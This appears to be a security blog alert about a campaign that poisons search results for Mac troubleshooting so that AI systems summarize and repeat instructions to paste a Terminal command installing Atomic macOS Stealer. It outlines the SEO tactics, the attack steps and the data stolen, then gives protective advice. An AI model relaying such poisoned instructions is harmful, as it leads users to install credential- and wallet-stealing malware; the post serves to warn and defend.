Scammers are finding a new way to leverage artificial intelligence in their operations. Previously, I wrote an article on Scam as a Service and how fraud networks commercialize AI driven tools for abuse. In this new tactic, instead of using AI solely to generate phishing content, scammers are now manipulating search engine optimization so their malicious pages are surfaced, summarized, and repeated by legitimate AI systems themselves. This tactic closely resembles search engine poisoning techniques used by hackers in the early days of the web. Once malicious content ranks highly, it can be absorbed and redistributed by AI tools, dramatically expanding the reach of the scam. Reports of this activity prompted me to take a deep dive into the topic and this is what I found.
𝗧𝗛𝗘 𝗡𝗘𝗪 𝗧𝗛𝗥𝗘𝗔𝗧
Attackers are launching a coordinated campaign targeting Mac users through AI generated answers originating from poisoned search results. Rather than posing as AI directly, scammers focus on corrupting the information pipeline AI systems rely on; after all AI, at its root, is simply a supercharged search engine with some reasoning ability. By influencing what content is referenced by AI, scammers influence what AI tools summarize and recommend.
𝗠𝗔𝗖 𝗨𝗦𝗘𝗥 𝗧𝗥𝗨𝗦𝗧 𝗔𝗡𝗗 𝗧𝗛𝗘 𝗙𝗔𝗟𝗦𝗘 𝗦𝗘𝗡𝗦𝗘 𝗢𝗙 𝗦𝗘𝗖𝗨𝗥𝗜𝗧𝗬
For years, macOS has been widely perceived as being less susceptible to malware than other operating systems. This reputation was built on a combination of lower market share in earlier decades and stronger default security controls, a perception which influences user behaviour today. Many Mac users assume malware is primarily a Windows problem, this belief reduces suspicion when following online troubleshooting advice, increases the likelihood users will trust instructions presented as routine system maintenance. Scammers are deliberately exploiting this trust. By framing malicious commands as harmless cleanup steps and presenting them through AI generated answers.
𝗦𝗘𝗔𝗥𝗖𝗛 𝗘𝗡𝗚𝗜𝗡𝗘 𝗣𝗢𝗜𝗦𝗢𝗡𝗜𝗡𝗚
Scammers are actively exploiting SEO techniques to inject malicious instructions into search results that are later echoed by AI systems.
This is accomplished through:
- Targeting high intent Mac troubleshooting searches
- Publishing large volumes of keyword optimized technical content
- Mimicking legitimate macOS maintenance guidance
- Leveraging backlinks and compromised sites to inflate authority
These methods mirror black hat SEO tactics once used to poison search engine results with exploit pages and malware links.
𝗛𝗢𝗪 𝗧𝗛𝗘 𝗔𝗧𝗧𝗔𝗖𝗞 𝗪𝗢𝗥𝗞𝗦
Our research indicates this campaign primarily targets Mac users searching for solutions to common system issues such as freeing disk space or removing system files.
The attack typically unfolds as follows:
- A user searches for help with a Mac related problem
- Poisoned pages rank highly due to SEO manipulation
- AI systems summarize or repeat the malicious instructions
- The user is instructed to open macOS Terminal and paste a command
- The command downloads and installs Atomic macOS Stealer
Once executed, the system is compromised.
𝗧𝗛𝗘 𝗠𝗔𝗟𝗪𝗔𝗥𝗘 𝗕𝗘𝗛𝗜𝗡𝗗 𝗧𝗛𝗘 𝗦𝗖𝗔𝗠
Atomic macOS Stealer (AMOS)
Atomic macOS Stealer is a stealthy information stealing malware that operates silently in the background.
It can collect:
- Passwords stored in iCloud Keychain
- Browser cookies and autofill information
- Cryptocurrency wallets including Exodus and MetaMask
- System files and sensitive documents
Harvested data is transmitted to attackers almost immediately.
𝗪𝗛𝗬 𝗧𝗛𝗜𝗦 𝗦𝗖𝗔𝗠 𝗪𝗢𝗥𝗞𝗦
This campaign exploits layered trust rather than technical vulnerabilities. Users trust AI to provide reliable results, particularly when citations and source URL's are provided. Many Mac users also trust their platform is inherently safer. By combining all three assumptions, scammers create a powerful deception leading users to authorize the attack themselves.
𝗛𝗢𝗪 𝗧𝗢 𝗣𝗥𝗢𝗧𝗘𝗖𝗧 𝗬𝗢𝗨𝗥𝗦𝗘𝗟𝗙
Protection against this type of attack begins with changing assumptions, not installing more tools. These scams do not rely on exploiting software flaws, they rely on exploiting trust in search engines, AI generated answers, and long held beliefs about macOS security.
If an instruction requires you to manually run system commands, disable safeguards, or modify core system behaviour, it should be treated as hostile by default. The fact the guidance appears in a highly ranked search engine result or is repeated by an AI system does not make it safe.
With that mindset in place, the following precautions are essential:
- Treat ALL OS's, including MacOS as a target, not an exception
- Do not execute Terminal commands from search results or AI summaries
- Verify technical instructions through official Apple documentation
- Use reputable anti malware software designed for macOS
- If infection is suspected, disconnect from the internet and perform a full system scan
No operating system is immune to social engineering.
𝗛𝗘𝗟𝗣 𝗨𝗦 𝗪𝗔𝗥𝗡 𝗢𝗧𝗛𝗘𝗥𝗦
If you encounter AI generated advice or search results instructing users to run system commands, report the source pages to the platform. Share this alert to others, in particular MacOS users.
- Log in to post comments